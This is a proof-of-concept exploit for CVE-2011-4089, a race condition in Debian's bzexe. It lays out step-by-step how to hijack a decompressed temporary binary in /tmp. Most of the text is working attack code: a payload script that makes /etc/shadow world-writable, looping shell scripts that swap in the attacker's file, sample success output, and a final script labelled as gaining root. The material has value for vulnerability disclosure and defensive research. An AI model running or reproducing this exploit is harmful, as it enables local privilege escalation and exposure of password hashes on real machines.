Larry W. Cashdollar 11/5/2011 PoC code for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862 (CVE-2011-4089) credit vladz for finding this. The exploit works as follows. 1. determine which files are bzexe'd on a system say bash. 2. create a matching directory you own in /tmp 3. create a exploit script in /tmp say People have written exploits in C that work 100% of the time based on this script. cat > /tmp/bad << EOF #!/bin/sh chmod 777 /etc/shadow EOF 4. watch for the existence of /tmp/bash/gztmp* we want to know before the gztmp file is renamed to bash. larry@b0rk:~$ while (true) do ./exp.sh ; done #!/bin/bash if [ -a /tmp/bash/gztmp* ] then echo "Exploting bzexe." mv /tmp/bash /tmp/bash.dir echo "Copying evil file into place." cp /tmp/bad /tmp/bash fi This is a difficult race condition to win with a shell script (60% of the time), but it can be won 100% of the time with the exploits written in C. Failures will show: root@b0rk:/root# ./bash <-- missed copy ./bash: 22: /tmp/bash: not found root@b0rk:/root# ./bash <-- race failed because permissions weren't set yet on bash from cp ./bash: 22: /tmp/bash: Permission denied Success will show: root@b0rk:/root# ./bash root@b0rk:/root# ls -l /etc/shadow -rwxrwxrwx 1 root shadow 1024 2010-07-03 11:55 /etc/shadow larry@b0rk:~$ while (true) do ./exp.sh ; done Exploting bzexe. Copying evil file into place. Exploting bzexe. Copying evil file into place. Exploting bzexe. Copying evil file into place. Exploting bzexe. Copying evil file into place. Exploting bzexe. Copying evil file into place. Removing the echo commands from the exploit will increase probability of winning the race. TODO put while loop in exploit.sh script. Remove echo's. write in C using inotify() #!/bin/bash #gain root on a system using bzexe to compress binaries #/tmp/exec will be executed as user executing if we win the race. mkdir /tmp/$1 while true ; do if [ -a /tmp/$1/gztmp* ] then # echo "Exploting bzexe." mv /tmp/$1 /tmp/$1.dir # echo "Copying our evil code nto place." cp /tmp/exec /tmp/$1 fi done